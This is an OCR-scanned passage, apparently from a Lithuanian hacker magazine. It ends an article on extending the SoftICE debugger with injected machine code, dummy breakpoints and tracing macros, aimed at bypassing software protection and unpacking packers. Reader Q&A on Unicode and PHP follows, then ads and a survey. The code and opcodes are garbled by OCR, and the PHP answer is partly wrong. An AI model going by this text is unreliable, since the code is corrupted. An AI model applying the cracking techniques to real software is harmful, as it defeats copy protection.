rodo štai taip: „50h/8Bh C4h/83h E8h 10h/FFh DOh“. 
Kopijuojame derinamos programos fragmentą | steką: „M EIP L 
10 ESP-20', kur „ESP-20' — paskirties adresas, esantis virš 
steko viršūnės rodyklės ir neperrašantis mūsų mašininės pro- 
gramos. Dabar modifikuojame derinamos programos apylinkes: 
„ED EIP 83C48B50; ED EIP+4 DOFF10ES“. Kaip matyti, tai tas 
pats kodas, tik čia jis parašytas atvirkštine tvarka iš galo į priekį, 
kadangi x86 procesoriuose jaunesnysis baitas randamas ma- 
žesniu adresu. 
Čia paruošiamąjį etapą galima laikyti baigtu. Sukomanduojame 
T' (TRACE), kartodami šią komandą keturis kartus iki Įėjimo į 
mūsų funkciją, o po to įsakome padaryti „P RET, kad iš ten išei- 
tume. Ir viskas!!! EAX registre dabar nulis! Mūsų funkcija atliko 
savo darbą ir grąžino viską, ką norėjo! Argi tai ne puiku, kad de- 
rintuve galima vykdyti savo koda, parašytą lyg ant švaraus lapo?! 
Tiesa, problema čia tame, kaip išanalizuoti derintuve grąžintą 
reikšmę? Jeigu mes pabandytume eiti tiesiu keliu: „IF (eax==0) 
DO xxx", tai iš mūsų liktų tik faršas. SoftICE nesupranta sąlygi- 
nių komandų, 0 raktinis žodis IF gali būti naudojamas tik susto- 
jimo taškuose. Tuomet imkime ir sukurkime jam fiktyvų sustoji- 
mo tašką, kuris suveikia visada! Būtų kažkas panašaus į: 
Fiktyvus sustojimo taškas leidžia naudoti raktinį žodį IF 

BPX ElP IF (FAX =0) DO xa: 
Savaime suprantama, nepriklausomai nuo to, ar sustojimo taš- 
kas suveiks, ar ne, mums reikia atstatyti EAX registrą (vėliavėlių 
mes nepamiršome, tačiau jų neišsaugom, kad neapkrautume 
kodo), atgal grąžinti originalios programos fragmentą ir pašalin- 
ti fiktyvų sustojimo tašką, kadangi sustojimo taškų skaičius r- 
botas. EAX registras gali būti atstatytas su komanda POP EAX, 
einančia po CALL EAX, o grąžinti programą į vietą padės kon- 
strukcija „M ESP-20 L 10 ElP-9“. Iš kur čia atsirado „EIP-9'? 
Kodėl ne ElP? Juk atliekant „pataisymą“ EIP reikšmė pasikeitė! 
Skaičius „9“ ir yra mūsų pataisymo dydis kartu su komanda 
POP FAX. Telieka pasakyti „R EIP = EIP-9“, kad grąžintume ElP 
į vieta, ir galima drasiai toliau vykdyti derinama programą. Jeigu 
viskas buvo padaryta teisingai ir joks apsauginis mechanizmas 
nenaudojo neįdarbinto steko, tai derinama programa nenuluš. 
Beje, „Windows 9x“ sistemose sutrikimai su tam tikra tikimybe 
vis dėlto pasirodys, kadangi ši sistema aktyviai šiukšlina steke. 
Kad neleistum jai taip išdykauti, visų operacijų vykdymo metu 
ESP registrą derėtų timptelėti į viršų, 0 po to vėl nuleisti atgal. 
Savaime suprantama, nėra būtina mašininius kodus kiekvieną 
kartą rašyti rankiniu būdu. Tai varginantis užsiėmimas, kurio ma- 
loniu niekaip nepavadinsi. Štai čia mums ir praverčia makrosai! 
Komanduojam „MACRO MACRO NAME = "xx0x"“ ir įtraukiame 
šį makrosą į nuolatinių sąrašą. Tai daroma taip: paleidžiame 
Symbol Loader, užeiname į Edit -> SoftlCE Initialization Set- 
ting, pereiname į skyrelį Macro Definitions, spaudžiam Add, su- 
teikiame makrosui vardą (name) ir kūną (definition). Dabar mak- 
rosas automatiškai krausis kartu su Soft/CE. Galima sukurti nuo- 
savų praplėstų sąlyginių sustojimo taškų biblioteką, kuri pripa- 
žintų sub-eilutės paieškos eilutėje arba eilučių sulyginimo pa- 
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gal *' ir ,?* šablonus funkcijas. Tai iš tiesų galima padaryti, po 
ko Soft/CE galia smarkiai išaugs, be to, mes gausime puikią 
galimybę pasipraktikuoti mašininių kodų programavimo srityje! 
Beje, makrosai leidžia išspręsti ir kitą problemą. Esmė tame, 
kad SoftICE neturi įmontuotų sustojimo taškų, be kurių mes 
niekaip neapsieisime (kaip tu tikriausiai pameni, EAX registro 
turinio analizei mums teko sukurti fiktyvų sustojimo tašką). Jei- 
gu pabandysime parašyti: „BPX CreateFileA DO “xxx; bpx EIP DO 
"XXXX"; X;"“, mums nieko neišeis! Soft/CE susipainios kabutėse 
Ir atsisakys suvirškinti tokią konstrukciją. Tačiau jeigu mes „bpx 
EIP DO "XX" apiformintume kaip makrosą, kuris būtų pava- 
dintas, pavyzdžiui, XYZ, tuomet derintuvas konstrukciją „BPX Cre- 
ateFileA DO "xx; XYZ; x;"“ supras visiškai normaliai. 


[„Anime“ ir „SoftICE“] Kai kurie derintuvai (tokie, kaip, pavyz- 
džiui, OllyDbg) turi vieną naudingą savybę, kurios neturi SoftlCE. 
Konkrečiau šnekant — animuotą galimybę pažingsniui trasuoti 
su sąlyginiais sustojimo taškais kiekviename žingsnyje. Pavyzdžiui, 
sustojimo tašką galima sukonfigūruoti konstrukcijai „TEST EAX,EAX/ 
Jx XXX“, taip priverčiant derintuvą sustoti kiekvieną kartą, kai EAX 
bus lygus nuliui arba bet kokiai kitai reikšmei pagal mūsų pasirin- 
kimą. Pavyzdžiui, kažkas panašaus į „BPX IF (*word(EIP)==0xC085 
64. (*byte(EIP+2) 8 70h)==70h)'. Čia OxC085 — komandos 
TEST EAX,EAX operacijos kodas, o 70h — instrukcijos Jx kaukė, 
na o visas sustojimo taškas bendrai paėmus leidžia perimti „if 
(func(1,2,3)!=0)...“ tipo kodą, kuris dažnai naudojamas apsau- 
giniuose mechanizmuose. Soft/CE tokių pokštų nesupranta ir rei- 
kalauja, kad sustojimo taško adresas būtų aiškiai nurodytas, pa- 
vyzdžiui, „BPX EIP..', tačiau ir tokiu atveju jis sukurs vienintelį su- 
stojimo tašką, remdamasis einama ElP reikšme (kokia ji buvo 
sustojimo taško sukūrimo momentu) ir atsisako jį automatiškai 
„perskaičiuoti“ programos sekimo metu. Kaip gaila! Juk būtent 
dėl šios galimybės daugelis hakerių atsisako Įprastinio SoftiCE ir 
migruoja | OllyDbg pusę. Nepaisant to, sprendimas yra! 
Makrosai gali būti įmontuoti! Pabandykite parašyti „MACRO 
XYZ="T; XYZ;"*, surinkite XYZ Ir pažiūrėkite, kas gausis. Soft ICE 
pradės animuoti programą! Nelabai greitai, tačiau vis dėlto pa- 
kankamai našiai. Bet kokiu atveju, pakuotojų išpakavimui kuo 
puikiausiai tiks. 

Kadangi mes išmokome animuoti programą, sąlyginių taškų su- 
kūrimas jau nebus problema. Štai, pavyzdžiui, toks naudingas 
makrosas: „MACRO XYZ = "BPX ElP;:TXYZ;"'. Ką jis daro? Ogi 
štai ką! Jis išskiria programos sekimo trasą, pažymėdamas įvyk- 
dytą kodą, dėl ko mes iš karto matome, kurie sąlyginiai perėji- 
mai jau įvykdyti, o kurie dar ne. Tik būtina įvertinti, kad sustoji- 
mo taškų kiekis ribotas, todėl juos būtina periodiškai pašalinti. 


Pabaiga] SoftICE — tai iš tiesų galingas nepaprastai didelę griau- 
namąją jėgą turintis įrankis, kuris leidžia daryti viską, ko tik reikia. 
Svarbiausia — turėti fantaziją. Mūsiškiai visada išsiskiria sugebėji- 
mu iš visų parankinių priemonių surinkinėti nepaprastus dalykus. 
Taip pat ir su derinimu. Užuot ieškojus derintuvo, kuris realizuoja 
mums reikalingą funkcionalumą, mes galime į rankas pasiimti di|- 
dę ir papildyti jau egzistuojantį. juo labiau kad loginimas — tai ne 
vienintelė alternatyvi SoftiCE profesija. Norint iš jo galima sukurpti 
pulkų dumper'į arba dar ką nors. Tačiau tai jau kito pokalbio tema. 
Svarbiausia — pagauti minų. Šis straipsnis nesiūlo paruoštų 
sprendimų, tačiau jis sukelia ištisą galimybių klodą, kurias kiek- 
vienas gali panaudoti savo nuožiūra. 


Paaiškink, kodėl su Visual Studio 2005 ne- 
galima paprastai iškviesti funkcijos AfxMes- 
sageBox(“Pranešimas") — tenka visa tai su- 
skaidyti į tris atskirus operatorius: 

Giring LButClick: 

Lšutdick=" Pranešimas"; 

AlMessageBox(LButČlick); 


A: Tai tiesiogiai susiję su VS2005 naudojamu 

kitu simbolių kodavimo standartu, konkrečiau— 

Unicode. Tam, kad viskas veiktų iš karto, prieš 
kabutes įterpk raidę L. Tokiu atveju funkcija bus 
iškviečiama štai taip: AfxMessageBox(L'Praneši- 
mas"). Unicode koduotėje vieną simbolį atitinka 
ne vienas baitas, o du, todėl reikia atlikti tam tik- 
rą transformavimą. Jeigu Unicode nereikalingas, 
tuomet projekto parametruose jį galima atjungti 
arba panaudoti direktyvą 4žundef UNICODE. Pas- 
tarąją reikia įtraukti į visas projekto bylas. 


PHP kalboje yra dvi funkcijos: print ir echo. 
Abi išveda tekstą į ekraną (t-y. web puslapi), 
tačiau tikriausiai turėtų kuo nors skirtis? 


Interpretavus štai tokį kodą: 


(0) 


Į ekraną bus išvestos dvi vienodos frazės: 


< "php 

print "Hello Word! <br />; 
echo "Hello World!" 
2> 


Hello Wald! 
Hello World! 


Dėl to vienos ar kitos funkcijos naudojimas priklau- 
so nuo asmeninio požiūrio. Tačiau skirtumas vis dėlto 
yra — jis tiesiogiai susijęs su tuo, kaip tu naudoji 
išvedimą. Naudojant funkciją print, grąžinama logi- 
nė reikšmė (True arba False). Tai gali būti patogu, 
pavyzdžiui, realizuojant rūšiavimo algoritmus. O funk- 
cija Echo negrąžina kokios nors reikšmės, tačiau ji 
vykdoma šiek tiek greičiau. 
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Elitinio 


HAKERIŲ KLUBO 


nariams taikomos 


Interneto klube „IMPRESS“ 
su ELITE CLUB nario kortele 
suteikiama 20 96 nuolaida! 


Hi | 


KMPPRESS 


Kaunas, Savanorių pr. 255, 
(HYPER MAXIMA) 


Pateikus ELITE CLUB 
kortelę visose BMS 
parduotuvėse suteikiama 
5 46 nuolaida. 


ELITE CLUB 


*0045893155 


E-ET MUMS 


HAKERIŲ KLUBAS 


Kaunas 

Savanorių pr. 66 

Tel.: (37) 75 10 10 

El. paštas: kaunas(Obms.lt 


Vilniu 

BMS MEGAPOLIS, 

Laisvės pr. 2 

Tel.: (5) 24 77 300 

El. paštas: v.megapolis(Obms.lt 


BMS MEGAPOLIS, KI 
Minijos g. 2 

Tel.: (46) 38 33 33 

El. paštas: klaipeda(Obms.lt 


ipėd 
Savanorių pr.301 
Tel.: (37) 313101 
El. paštas: megapolisObms.lt 
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Vardas Kitame numeryje norėčiau rasti: 

Pavardė Ka 

Amžius El 

Adresas z 

Kiek žurnalo numerių skaitei? 
1) numerius 
+ Kokią OS naudoji? 
El.paštas 


Tavo klausimas į FAG: 


Išvardink tris, tavo manymu, 

įdomiausius šio numerio straipsnius: 35-0JO NUMERIO 
NUGALĖTOJAS: 
REMIGIJUS VAISNYS 


=. IŠ KLAIPĖDOS 
JAM ATITENKA 
| MICROSOFT WIRELESS 
OPTICAL KLAVIATŪRA IR PELĖ 


ir tris prasčiausius: 


LAIMĖTOJO PRAŠOM 
PASKAMBINTI | REDAKCIJĄ IR 
SUSITARTI DĖL PRIZO 
ATSIĖMIMO. 
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£—N 
BERKANTĖ LOS 
=5 
sorius: AMD 64bit 2800 + 
is diskas: 80 Gb SATA/Bmb 
56 Mb 


54 em 


VISIŠKAI 


PLOKŠČIAS 


1105,--::|120s,--:*|1339,--/**|14273,-- | 1607,-: 71 
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IotEcrija 


OHO LOTTO jau laimėta apie 30 000 Lt, | 
k Turime net 65 DIDŽIOJO PRIZO laimėtojus! , 


= 


Išskyrus TELEZ 
BILIETO KAINA 1 Lt + sms siuntimo kaina O,20 Lt 


Rašyk SMS: OHO ir 3 skaičius iš 12 (pvz: ono 2 11 9) 
siųsk SMS 1606 ir netrukus gausi loterijos bilietą. 


nww.ohnolotto.lt Zžėgimas vyksta kasdien 21:25 per BTV 


